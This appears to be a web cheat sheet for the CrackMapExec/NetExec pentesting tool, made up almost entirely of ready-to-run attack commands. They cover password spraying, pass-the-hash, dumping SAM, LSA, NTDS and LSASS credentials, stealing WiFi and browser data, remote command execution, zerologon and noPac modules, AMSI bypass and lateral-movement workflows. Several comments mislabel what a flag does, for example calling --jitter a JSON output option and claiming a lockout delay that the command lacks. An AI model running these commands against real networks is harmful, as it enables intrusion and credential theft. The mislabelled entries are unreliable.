Skip to content

CrackMapExec (NetExec)

Swiss army knife for pentesting networks. CrackMapExec has been forked to NetExec, but both are widely used.

Installation

# Install CrackMapExec
pip install crackmapexec

# Or NetExec (newer fork)
pip install netexec

# From source
git clone https://github.com/Porchetta-Industries/CrackMapExec
cd CrackMapExec
pip install .

Basic Usage

Protocols

# SMB
crackmapexec smb target

# WinRM
crackmapexec winrm target

# LDAP
crackmapexec ldap target

# MSSQL
crackmapexec mssql target

# RDP
crackmapexec rdp target

# SSH
crackmapexec ssh target

# FTP
crackmapexec ftp target

SMB Enumeration

Host Discovery

# Single host
crackmapexec smb 192.168.1.10

# Subnet scan
crackmapexec smb 192.168.1.0/24

# Multiple hosts from file
crackmapexec smb targets.txt

# Show SMB version
crackmapexec smb 192.168.1.0/24 --gen-relay-list relay_targets.txt

Authentication

# With credentials
crackmapexec smb 192.168.1.10 -u administrator -p Password123

# With hash (Pass-the-Hash)
crackmapexec smb 192.168.1.10 -u administrator -H NTHASH

# Null session
crackmapexec smb 192.168.1.10 -u '' -p ''

# Guest account
crackmapexec smb 192.168.1.10 -u 'guest' -p ''

# Multiple users and passwords
crackmapexec smb 192.168.1.10 -u users.txt -p passwords.txt

# Continue on success (don't stop at first match)
crackmapexec smb 192.168.1.10 -u users.txt -p passwords.txt --continue-on-success

# Local authentication
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --local-auth

Share Enumeration

# List shares
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --shares

# Access specific share
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --shares SHARENAME

# List share contents
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --shares -M spider_plus

# Readable shares
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --shares | grep READ

# Download files matching pattern
crackmapexec smb 192.168.1.10 -u administrator -p Password123 -M spider_plus -o DOWNLOAD_FLAG=True

User Enumeration

# Enumerate domain users
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --users

# Enumerate groups
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --groups

# Enumerate local users
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --local-users

# Get sessions
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --sessions

# Logged on users
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --loggedon-users

# RID brute force
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --rid-brute

Password Spraying

# Single password across multiple users
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Password123'

# Avoid lockouts with delay
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Password123' --continue-on-success

# Check for multiple passwords
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Password123' 'Summer2024!' 'Welcome123'

# Output to file
crackmapexec smb 192.168.1.0/24 -u users.txt -p passwords.txt --continue-on-success | tee spray_results.txt

Credential Dumping

SAM Database

# Dump SAM
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --sam

# Dump SAM with hash
crackmapexec smb 192.168.1.10 -u administrator -H NTHASH --sam

LSA Secrets

# Dump LSA secrets
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --lsa

# Dump NTDS (Domain Controller)
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --ntds

# Dump NTDS with VSS method
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --ntds vss

# Dump specific user from NTDS
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --ntds --user administrator

LSASS Dump

# Dump LSASS memory
crackmapexec smb 192.168.1.10 -u administrator -p Password123 -M lsassy

# Procdump method
crackmapexec smb 192.168.1.10 -u administrator -p Password123 -M procdump

Command Execution

Execute Commands

# Execute command via SMB
crackmapexec smb 192.168.1.10 -u administrator -p Password123 -x "whoami"

# PowerShell command
crackmapexec smb 192.168.1.10 -u administrator -p Password123 -X '$PSVersionTable'

# Execute on multiple hosts
crackmapexec smb 192.168.1.0/24 -u administrator -p Password123 -x "hostname"

# No output
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --exec-method smbexec -x "whoami"

Execution Methods

# Default (WMI)
crackmapexec smb 192.168.1.10 -u administrator -p Password123 -x "whoami"

# WMIEXEC
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --exec-method wmiexec -x "whoami"

# SMBEXEC (no output)
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --exec-method smbexec -x "whoami"

# ATEXEC (scheduled task)
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --exec-method atexec -x "whoami"

# MMC20 (via DCOM)
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --exec-method mmcexec -x "whoami"

Modules

List Modules

# List all modules
crackmapexec smb -L

# Module info
crackmapexec smb -M MODULE_NAME --module-info

Common Modules

# Enum_avproducts - Check AV
crackmapexec smb 192.168.1.10 -u administrator -p Password123 -M enum_avproducts

# Mimikatz
crackmapexec smb 192.168.1.10 -u administrator -p Password123 -M mimikatz

# UAC check
crackmapexec smb 192.168.1.10 -u administrator -p Password123 -M uac

# WiFi passwords
crackmapexec smb 192.168.1.10 -u administrator -p Password123 -M wifi

# Enum Chrome
crackmapexec smb 192.168.1.10 -u administrator -p Password123 -M enum_chrome

# Check for MS17-010
crackmapexec smb 192.168.1.0/24 -M ms17_010

# PetitPotam
crackmapexec smb 192.168.1.10 -u administrator -p Password123 -M petitpotam

# noPac
crackmapexec smb 192.168.1.10 -M nopac

# zerologon
crackmapexec smb 192.168.1.10 -M zerologon

Spider Plus

# Spider shares and download files
crackmapexec smb 192.168.1.10 -u administrator -p Password123 -M spider_plus

# Download files
crackmapexec smb 192.168.1.10 -u administrator -p Password123 -M spider_plus -o DOWNLOAD_FLAG=True

# Specific share
crackmapexec smb 192.168.1.10 -u administrator -p Password123 -M spider_plus -o SHARE=C$

# File patterns
crackmapexec smb 192.168.1.10 -u administrator -p Password123 -M spider_plus -o PATTERN=.doc,.xls,.pdf

WinRM

# Test WinRM access
crackmapexec winrm 192.168.1.10 -u administrator -p Password123

# Execute command
crackmapexec winrm 192.168.1.10 -u administrator -p Password123 -x "whoami"

# With hash
crackmapexec winrm 192.168.1.10 -u administrator -H NTHASH

LDAP

# LDAP authentication
crackmapexec ldap 192.168.1.10 -u administrator -p Password123

# Enumerate users
crackmapexec ldap 192.168.1.10 -u administrator -p Password123 --users

# Enumerate groups
crackmapexec ldap 192.168.1.10 -u administrator -p Password123 --groups

# Get domain SID
crackmapexec ldap 192.168.1.10 -u administrator -p Password123 -M get-desc-users

# ASREPRoast
crackmapexec ldap 192.168.1.10 -u administrator -p Password123 -M asreproast

# Kerberoast
crackmapexec ldap 192.168.1.10 -u administrator -p Password123 -M kerberoast

# Get DNS records
crackmapexec ldap 192.168.1.10 -u administrator -p Password123 -M adcs

# Enumerate ADCS
crackmapexec ldap 192.168.1.10 -u administrator -p Password123 -M adcs

MSSQL

# Test MSSQL access
crackmapexec mssql 192.168.1.10 -u sa -p Password123

# Enumerate databases
crackmapexec mssql 192.168.1.10 -u sa -p Password123 --query "SELECT name FROM master.dbo.sysdatabases"

# Execute command via xp_cmdshell
crackmapexec mssql 192.168.1.10 -u sa -p Password123 -x "whoami"

# With Windows auth
crackmapexec mssql 192.168.1.10 -u administrator -p Password123 -d domain.local

Database

Credential Storage

# View database
crackmapexec smb --help

# Database location
~/.cme/workspaces/default/smb.db

# Query database
sqlite3 ~/.cme/workspaces/default/smb.db "SELECT * FROM hosts"

# Clear database
crackmapexec smb --clear-obfuscate

Workspaces

# Create workspace
crackmapexec smb 192.168.1.10 -u admin -p pass --workspace pentesting

# List workspaces
ls ~/.cme/workspaces/

Obfuscation

# Obfuscate commands
crackmapexec smb 192.168.1.10 -u administrator -p Password123 -x "whoami" --obfs

# AMSI bypass
crackmapexec smb 192.168.1.10 -u administrator -p Password123 -X '$PSVersionTable' --amsi-bypass /path/to/bypass.ps1

Output Options

# Verbose
crackmapexec smb 192.168.1.10 -u administrator -p Password123 -v

# Save output
crackmapexec smb 192.168.1.0/24 -u administrator -p Password123 --users | tee users.txt

# JSON output
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --users --jitter 1

Common Workflows

Domain Enumeration Workflow

# 1. Discover hosts
crackmapexec smb 192.168.1.0/24

# 2. Test credentials
crackmapexec smb 192.168.1.0/24 -u administrator -p Password123

# 3. Check admin access (Pwn3d!)
crackmapexec smb 192.168.1.0/24 -u administrator -p Password123 | grep Pwn3d

# 4. Enumerate shares on admin hosts
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --shares

# 5. Enumerate users
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --users

# 6. Dump SAM
crackmapexec smb 192.168.1.10 -u administrator -p Password123 --sam

# 7. If DC, dump NTDS
crackmapexec smb 192.168.1.5 -u administrator -p Password123 --ntds

Password Spraying Workflow

# 1. Enumerate users
crackmapexec smb 192.168.1.10 -u lowpriv -p Password123 --users > domain_users.txt

# 2. Clean user list (extract just usernames)
cat domain_users.txt | grep -oP '(?<=\\)[^\\]+(?= )' > users.txt

# 3. Spray common passwords
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Password123' 'Welcome2024!' --continue-on-success

Lateral Movement

# 1. Find admin access
crackmapexec smb 192.168.1.0/24 -u administrator -H NTHASH | grep Pwn3d

# 2. Dump credentials from accessible hosts
crackmapexec smb 192.168.1.10-20 -u administrator -H NTHASH --sam --lsa

# 3. Use new creds to move further
crackmapexec smb 192.168.1.0/24 -u newuser -H NEWHASH

Quick Reference

# Host discovery
crackmapexec smb 192.168.1.0/24

# Test credentials
crackmapexec smb 192.168.1.10 -u admin -p Password123

# Pass-the-Hash
crackmapexec smb 192.168.1.10 -u admin -H NTHASH

# Password spray
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Password123' --continue-on-success

# Enumerate shares
crackmapexec smb 192.168.1.10 -u admin -p pass --shares

# Enumerate users
crackmapexec smb 192.168.1.10 -u admin -p pass --users

# Dump SAM
crackmapexec smb 192.168.1.10 -u admin -p pass --sam

# Dump NTDS (DC)
crackmapexec smb 192.168.1.10 -u admin -p pass --ntds

# Execute command
crackmapexec smb 192.168.1.10 -u admin -p pass -x "whoami"

# Modules
crackmapexec smb 192.168.1.10 -u admin -p pass -M MODULE_NAME